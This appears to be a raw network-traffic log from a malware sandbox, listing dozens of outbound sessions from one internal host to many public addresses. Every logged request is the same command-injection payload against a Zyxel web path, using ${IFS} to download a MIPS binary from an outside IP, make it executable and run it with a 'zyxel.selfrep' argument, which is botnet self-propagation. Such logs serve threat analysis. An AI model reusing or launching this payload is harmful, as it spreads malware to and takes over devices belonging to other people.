                                                  Jan 19, 2024 18:23:56.054234028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4324192.168.2.1352678181.27.117.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054271936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4325192.168.2.1339132222.44.26.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054312944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4326192.168.2.135402082.130.230.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054315090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4327192.168.2.135915290.2.9.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054368019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4328192.168.2.1345820220.208.237.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054404020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4329192.168.2.1334542179.56.235.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054451942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4330192.168.2.134143234.109.249.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054497004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4331192.168.2.1351396155.161.209.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054522991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4332192.168.2.1350606209.27.177.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054578066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4333192.168.2.1347604107.176.248.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054615974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4334192.168.2.1352964201.135.226.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054663897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4335192.168.2.133280019.74.174.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054687023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4336192.168.2.1341788216.35.222.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054728985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4337192.168.2.135383850.85.141.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054774046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4338192.168.2.1344696172.161.28.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054832935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4339192.168.2.1341568106.239.248.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054853916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4340192.168.2.133374094.218.148.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054893017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4341192.168.2.1335538137.183.26.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054925919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4342192.168.2.135424031.73.237.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.054975986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4343192.168.2.135700041.10.152.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055006981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4344192.168.2.1353394207.131.204.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055057049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4345192.168.2.1354682174.5.166.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055097103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4346192.168.2.1350850169.94.69.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055149078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4347192.168.2.135207836.121.92.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055177927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4348192.168.2.135070018.155.67.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055226088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4349192.168.2.133895270.154.226.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055244923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4350192.168.2.135376467.39.188.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055279970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4351192.168.2.134784440.48.116.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055313110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4352192.168.2.134420627.152.7.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055358887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4353192.168.2.1346028167.221.138.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055382013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4354192.168.2.134434425.227.213.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055447102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4355192.168.2.133845018.172.12.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055473089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4356192.168.2.133590038.122.144.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055516005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4357192.168.2.1360268172.14.210.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055550098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4358192.168.2.133851025.149.13.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055599928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4359192.168.2.1343488177.76.143.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055634975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4360192.168.2.133665097.230.85.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055660963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4361192.168.2.1333398131.24.36.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055706024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4362192.168.2.1343220119.163.6.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055727959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4363192.168.2.134597279.41.189.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055751085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4364192.168.2.1337774168.191.179.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055795908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4365192.168.2.133312432.119.18.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055838108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4366192.168.2.13386221.30.148.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055866003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4367192.168.2.1343934200.176.78.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055917025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4368192.168.2.133586266.26.39.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.055975914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4369192.168.2.1346732147.249.190.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056004047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4370192.168.2.1343428181.167.119.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056045055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4371192.168.2.134230227.10.191.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056077003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4372192.168.2.1333406163.81.60.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056129932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4373192.168.2.1344032101.174.193.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056169987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4374192.168.2.133940886.208.207.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056210041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4375192.168.2.135721647.225.37.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056257010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4376192.168.2.133905679.24.144.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056288958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4377192.168.2.134384250.199.45.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056324959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4378192.168.2.1348988165.255.132.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056377888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4379192.168.2.1351910211.60.142.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056411028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4380192.168.2.133596840.161.191.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056443930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4381192.168.2.134751294.30.196.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056473017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4382192.168.2.1350898108.214.199.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056524038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4383192.168.2.133957242.219.144.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056550026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4384192.168.2.133934098.184.241.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056605101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4385192.168.2.133785274.188.48.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:56.056631088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4386192.168.2.134623854.82.178.120443
                                                  TimestampBytes transferredDirectionData
